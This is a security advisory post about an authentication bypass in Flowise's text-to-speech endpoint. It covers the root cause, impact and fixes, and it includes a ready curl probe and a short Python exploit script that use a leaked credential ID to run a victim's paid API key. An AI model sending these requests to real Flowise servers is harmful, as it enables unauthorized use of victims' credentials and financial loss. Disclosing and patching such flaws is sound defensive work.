Flowise, Authentication Bypass, CVE-2024-31623 (critical)

Listen to this Post

The vulnerability exists in the text-to-speech generation endpoint POST /api/v1/text-to-speech/generate, which is whitelisted in `packages/server/src/utils/constants.ts` (line 41) – meaning no authentication is required. The endpoint accepts a `credentialId` directly in the request body. When `chatflowId` is omitted, the code at `packages/server/src/controllers/text-to-speech/index.ts` lines 58-64 uses the attacker-controlled `credentialId` to decrypt stored API credentials (e.g., OpenAI, ElevenLabs, Azure, Google). The decrypted key is then used to generate speech. Docker validation proves the attack: sending a POST request with an arbitrary `credentialId` triggers an SSE `tts_start` event, confirming the code path executes without authentication. The request only fails if the `credentialId` does not exist, but the decryption attempt already demonstrates unauthorized access. Combined with a leaked credential ID (e.g., from another finding), an attacker can fully impersonate the victim. The impact includes burning API credits, generating unlimited speech, and using the victim’s paid services without consent. The root cause is the whitelisted endpoint lacking ownership validation. The suggested fix removes the endpoint from `WHITELIST_URLS` or enforces that `credentialId` belongs to the provided chatflowId, returning a 401 if `chatflowId` is missing.

dailycve form:

Platform: Flowise
Version: <=1.6.5
Vulnerability: Auth bypass
Severity: Critical
date: 2024-06-10

Prediction: 2024-07-01

Analytics under What Undercode Say:

Check if endpoint is exposed
curl -X POST http://target:3000/api/v1/text-to-speech/generate \
-H "Content-Type: application/json" \
-d '{"credentialId":"victim-cred-123","provider":"openai","voice":"en-US","model":"tts-1"}'
Monitor SSE events for tts_start
Extract credential IDs from logs or previous leaks

Exploit:

import requests
target = "http://victim-flowise:3000"
payload = {
"credentialId": "leaked_credential_id",
"provider": "elevenlabs",
"voice": "Rachel",
"model": "eleven_monolingual_v1"
}
r = requests.post(f"{target}/api/v1/text-to-speech/generate", json=payload)
Generates speech using victim's API key

Protection from this CVE:

  • Remove `/api/v1/text-to-speech/generate` from `WHITELIST_URLS` in `constants.ts`
    – Require `chatflowId` and validate that `credentialId` matches the chatflow’s TTS config
  • Return 401 if `chatflowId` is missing or credential does not belong to chatflow
  • Apply network segmentation to restrict TTS endpoint to trusted backends

Impact:

  • Unauthorized consumption of victim’s API credits (financial loss)
  • Exposure of decrypted API keys if combined with credential ID leak
  • Unlimited speech synthesis leading to potential abuse (e.g., deepfake audio generation)
  • No audit trail because endpoint bypasses authentication

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top